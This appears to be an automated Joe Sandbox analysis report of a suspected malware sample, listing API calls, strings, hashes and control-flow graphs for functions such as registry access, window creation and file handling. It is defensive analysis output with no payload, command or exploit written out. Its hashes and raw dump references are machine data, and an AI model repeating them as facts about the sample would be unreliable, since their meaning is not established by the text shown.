                                                                                                                                            • Instruction ID: 7be907fbd1064f4b9f3190f111e79d0658fab37b058360b3d457411cb15e8841
                                                                                                                                            • Opcode Fuzzy Hash: 7bbf17e82cd49d377d3b020eaa3d2fd02e377dfb3e1334304de9243c6eb282b0
                                                                                                                                            • Instruction Fuzzy Hash: C551F5726103008FDB15CF78D984756BBD4EF85318F18C9AED448CB295E774C845EB91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5465 29f765c-29f7696 MulDiv 5466 29f76ae-29f76e7 call 29f0204 call 29f02a4 call 29f0308 5465->5466 5467 29f7698-29f769f call 29f7618 5465->5467 5478 29f76e9-29f76f4 call 29f0538 5466->5478 5479 29f7701-29f7716 call 29d38d0 5466->5479 5467->5466 5473 29f76a1-29f76a9 call 29d4820 5467->5473 5473->5466 5482 29f76f9-29f76fc call 29f0274 5478->5482 5482->5479
                                                                                                                                            APIs
                                                                                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 029F7682
                                                                                                                                              • Part of subcall function 029F7618: GetDC.USER32(00000000), ref: 029F7621
                                                                                                                                              • Part of subcall function 029F7618: SelectObject.GDI32(00000000,058A00B4), ref: 029F7633
                                                                                                                                              • Part of subcall function 029F7618: GetTextMetricsA.GDI32(00000000), ref: 029F763E
                                                                                                                                              • Part of subcall function 029F7618: ReleaseDC.USER32(00000000,00000000), ref: 029F764F
                                                                                                                                            Strings
                                                                                                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 029F76D8
                                                                                                                                            • MS Shell Dlg 2, xrefs: 029F76EC
                                                                                                                                            • Tahoma, xrefs: 029F76A4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MetricsObjectReleaseSelectText
                                                                                                                                            • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                                                                                            • API String ID: 2013942131-1011973972
                                                                                                                                            • Opcode ID: 227b4499ade374a60fc9c1f81deaa511f3e70a657f7574b37ce46e642e89d376
                                                                                                                                            • Instruction ID: 47b71f53b78aa3d8d9a0cc7c49e6f0e104a1b085e06a611a8a3e68ff231e221c
                                                                                                                                            • Opcode Fuzzy Hash: 227b4499ade374a60fc9c1f81deaa511f3e70a657f7574b37ce46e642e89d376
                                                                                                                                            • Instruction Fuzzy Hash: F011A330A50248AFEBC1EFA8D8419EDB7EAEB89700F6144A4E600D7655DB71AD11CF51
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5502 29eea38-29eea66 GetClassInfoA 5503 29eea68-29eea70 5502->5503 5504 29eea72-29eea74 5502->5504 5503->5504 5505 29eea91-29eeac6 call 29d738c 5503->5505 5506 29eea76-29eea82 UnregisterClassA 5504->5506 5507 29eea87-29eea8c RegisterClassA 5504->5507 5510 29eeadc-29eeae2 5505->5510 5511 29eeac8-29eeace call 29ee97c 5505->5511 5506->5507 5507->5505 5513 29eead3-29eead7 SetWindowLongA 5511->5513 5513->5510
                                                                                                                                            APIs
                                                                                                                                            • GetClassInfoA.USER32(029D0000,029EEA28,?), ref: 029EEA59
                                                                                                                                            • UnregisterClassA.USER32(029EEA28,029D0000), ref: 029EEA82
                                                                                                                                            • RegisterClassA.USER32(02A3AAF8), ref: 029EEA8C
                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 029EEAD7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4025006896-0
                                                                                                                                            • Opcode ID: 057bff41aa2b369534d6daa27ed2a76ab912ffc40796134a3daeaf2ac1863816
                                                                                                                                            • Instruction ID: b5a8e30eac3a119649099324de380d058350fedb145cb1932468ad901cb1aec1
                                                                                                                                            • Opcode Fuzzy Hash: 057bff41aa2b369534d6daa27ed2a76ab912ffc40796134a3daeaf2ac1863816
                                                                                                                                            • Instruction Fuzzy Hash: 3E015E71A80105ABDB01EF98DC85FDB779EE749314F108915FA95E7281DB31D8528B60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,029F04A2), ref: 029F0374
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,029F04A2), ref: 029F03DF
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 029F0444
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                            • Opcode ID: b03f57cb1b808bc9ce44596d7b6e2b9e1bae5bf53a30de09f6548a63c2cfc652
                                                                                                                                            • Instruction ID: b17e9d0a397e9affe1b2a0a53a7b4f50b09b97bd0a029b4eccdc3776baec5076
                                                                                                                                            • Opcode Fuzzy Hash: b03f57cb1b808bc9ce44596d7b6e2b9e1bae5bf53a30de09f6548a63c2cfc652
                                                                                                                                            • Instruction Fuzzy Hash: A6417734B00308AFEB91EBA4D941BDEB7FEAF84304F108469E945A3296D7759F05AF50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029E9DE8,?,?,029E5B68,00000001), ref: 029E9CFC
                                                                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029E9DE8,?,?,029E5B68,00000001), ref: 029E9D2A
                                                                                                                                              • Part of subcall function 029D8CE0: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,029E5B68,029E9D6A,00000000,029E9DE8,?,?,029E5B68), ref: 029D8D2E
                                                                                                                                              • Part of subcall function 029D8F1C: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,029E5B68,029E9D85,00000000,029E9DE8,?,?,029E5B68,00000001), ref: 029D8F3B
                                                                                                                                            • GetLastError.KERNEL32(00000000,029E9DE8,?,?,029E5B68,00000001), ref: 029E9D8F
                                                                                                                                              • Part of subcall function 029DB878: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,029DD5E5,00000000,029DD63F), ref: 029DB897
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 503785936-0
                                                                                                                                            • Opcode ID: 0e4dc661bdb872f36a3c704b439a910be805ad5b3a0cc404870e187e8354f042
                                                                                                                                            • Instruction ID: 3e21ea0d8afe40cbfbf2a4b2e9b8b4091d006904e2cdb6cd3fe233d4eef7f54d
                                                                                                                                            • Opcode Fuzzy Hash: 0e4dc661bdb872f36a3c704b439a910be805ad5b3a0cc404870e187e8354f042
                                                                                                                                            • Instruction Fuzzy Hash: 10318530E042189FEB01EFB8C881BEDB7F6AF88304F51C565E504A7380D77969458FA1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,02B5ED0C), ref: 02A2C7CC
                                                                                                                                            • RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02A2C837), ref: 02A2C804
                                                                                                                                            • RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02A2C837), ref: 02A2C80F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 779948276-0
                                                                                                                                            • Opcode ID: da7301bb582ccf24034fb915af09bea54b7c0c36cdf825d21ccc9fe54b1c12f6
                                                                                                                                            • Instruction ID: d47dabde98f1f47306977abbec1a1b464dc89c57c901a3632332353f77982371
                                                                                                                                            • Opcode Fuzzy Hash: da7301bb582ccf24034fb915af09bea54b7c0c36cdf825d21ccc9fe54b1c12f6
                                                                                                                                            • Instruction Fuzzy Hash: 2E111C71640208AFEB01EFB8DD85A9E7BFDEB88750F519861F404DB250DB70EA41AE64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClearVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                            • Opcode ID: 2f3f4cae606554b410227460394ca4b655da39152e37378a6d2f11789e6c0fe4
                                                                                                                                            • Instruction ID: 31f55461ce324d11bec34f6a08cf6605e3908618cd628c5bfe320641bf6b2c43
                                                                                                                                            • Opcode Fuzzy Hash: 2f3f4cae606554b410227460394ca4b655da39152e37378a6d2f11789e6c0fe4
                                                                                                                                            • Instruction Fuzzy Hash: 35F0C27870011057DB256B389D866E923AE5F80740B50D865E4879BA11CB35CC0AF723
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(02A2C89C), ref: 029D4F76
                                                                                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 029D5063
                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 029D5075
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$Free$Alloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 986138563-0
                                                                                                                                            • Opcode ID: f46f36ae17db063219812039f4efadb23abcdbc84c1bdec671a070b6a7e02eb9
                                                                                                                                            • Instruction ID: 4e65cfcb71bde1398be6929f1dbcd0013a32169b44441e63cde4c0e2d2ce7a39
                                                                                                                                            • Opcode Fuzzy Hash: f46f36ae17db063219812039f4efadb23abcdbc84c1bdec671a070b6a7e02eb9
                                                                                                                                            • Instruction Fuzzy Hash: 7EE012BD1052016DEF146F699800F37336EAFC1600F54D869E900CA174DB39C451BD34
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 029EF5A6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 3341692771-2852464175
                                                                                                                                            • Opcode ID: 727024f3881022be6ad7ba3def061559d294045672f85a500dce25885a3ac18a
                                                                                                                                            • Instruction ID: e460a5b0efef2bdc771368a53613a72375be08eaac9e8b80cc9c87260469fe79
                                                                                                                                            • Opcode Fuzzy Hash: 727024f3881022be6ad7ba3def061559d294045672f85a500dce25885a3ac18a
                                                                                                                                            • Instruction Fuzzy Hash: D9B1E475A01608DFDF11CF98D480AADBBF6FF89314F54856AE80AAB760E730A945CF50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,029F0524), ref: 029F04F2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: QueryValue
                                                                                                                                            • String ID: MS Shell Dlg 2
                                                                                                                                            • API String ID: 3660427363-3198668166
                                                                                                                                            • Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                                                            • Instruction ID: fea54eae9697dfb1f69205917b25eb0df1c69e9db11a054da251a526665e5ddc
                                                                                                                                            • Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                                                            • Instruction Fuzzy Hash: C3F030623091086BD704EAADAD40FAB7BDDDBC5351F01843ABA4CC7241DA21DC099B75
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • VariantCopy.OLEAUT32(00000000,00000000), ref: 029DFAED
                                                                                                                                              • Part of subcall function 029DF6D0: VariantClear.OLEAUT32(?), ref: 029DF6DF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variant$ClearCopy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 274517740-0
                                                                                                                                            • Opcode ID: 6e17dea342b6617f18e0a25f5716ea350908078cbf536f86e956753a412567a9
                                                                                                                                            • Instruction ID: b0bccaacb19a34e48423986f27ce888a192ca3c745d96c64574f547055a1d1fd
                                                                                                                                            • Opcode Fuzzy Hash: 6e17dea342b6617f18e0a25f5716ea350908078cbf536f86e956753a412567a9
                                                                                                                                            • Instruction Fuzzy Hash: BA1182347003109BCB20AF28C89696763EAEF85390715D86AE84F8FA15DB38CC41EA52
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1927566239-0
                                                                                                                                            • Opcode ID: 8343ec323b34c7077e53f62499c9a035d61344d39b50939a136adfb896930792
                                                                                                                                            • Instruction ID: 1134addd4a687db57314c9de5b2c0af58e90c4819bbde55ef1e6cba92a72445b
                                                                                                                                            • Opcode Fuzzy Hash: 8343ec323b34c7077e53f62499c9a035d61344d39b50939a136adfb896930792
                                                                                                                                            • Instruction Fuzzy Hash: 34317072A00209AFDB10DFA8C886AEA77ECEB49304F54C562F907D3A50D730D991DB52
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029D73CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            • Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                                                            • Instruction ID: 4573041073f9f83ddc65dd4b08b1ff516de02644485fed04ae3b366347bb97b2
                                                                                                                                            • Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                                                            • Instruction Fuzzy Hash: 9CF07AB2700118BF9B80DE9DDC80EDBB7EDEB8C2A4B058165BA08D7200D630ED109BB4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029D73CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            • Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                                                            • Instruction ID: 73f0661aa9478826500155d02b042179716467db380d498f65c9d988d2586598
                                                                                                                                            • Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                                                            • Instruction Fuzzy Hash: ADF09DB2600118BF8B80DE9DDC80EDBB7EDEB8C2A4B058165FA0CD7200D630ED109BB4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?,00000000,029EEF85,?,?,?,00000000), ref: 029EEF65
                                                                                                                                              • Part of subcall function 029D4F68: SysFreeString.OLEAUT32(02A2C89C), ref: 029D4F76
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeFromProgString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4225568880-0
                                                                                                                                            • Opcode ID: 29d721b5fff568bb1954a0dd386dd61f6bab7b88f3698d103b10a40c7070a069
                                                                                                                                            • Instruction ID: e359f368536c4fb17daee35fe3127e1536b5e2566f6cb149fd8ffc16962a7390
                                                                                                                                            • Opcode Fuzzy Hash: 29d721b5fff568bb1954a0dd386dd61f6bab7b88f3698d103b10a40c7070a069
                                                                                                                                            • Instruction Fuzzy Hash: 20E02B303046087FE702EBA0CC01D5D77DDDFC9710FE288B1E441D3540DA705E009961
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(029D0000,?,00000105), ref: 029D5B96
                                                                                                                                              • Part of subcall function 029D5DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029D0000,02A3A794), ref: 029D5DF8
                                                                                                                                              • Part of subcall function 029D5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029D0000,02A3A794), ref: 029D5E16
                                                                                                                                              • Part of subcall function 029D5DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029D0000,02A3A794), ref: 029D5E34
                                                                                                                                              • Part of subcall function 029D5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029D5E52
                                                                                                                                              • Part of subcall function 029D5DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029D5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029D5E9B
                                                                                                                                              • Part of subcall function 029D5DDC: RegQueryValueExA.ADVAPI32(?,029D6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029D5EE1,?,80000001), ref: 029D5EB9
                                                                                                                                              • Part of subcall function 029D5DDC: RegCloseKey.ADVAPI32(?,029D5EE8,00000000,?,?,00000000,029D5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029D5EDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2796650324-0
                                                                                                                                            • Opcode ID: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
                                                                                                                                            • Instruction ID: 33ad9bb25dac34d172f19041162fc1d517b2f10648f77b51a69fb80dda1a04fb
                                                                                                                                            • Opcode Fuzzy Hash: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
                                                                                                                                            • Instruction Fuzzy Hash: D0E06DB1A013148FCF10DE58C9C0B8633D8AF08790F4185A5ED98CF346D3B1DA109BE0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 029D8D78
                                                                                                                                            Memory Dump Source
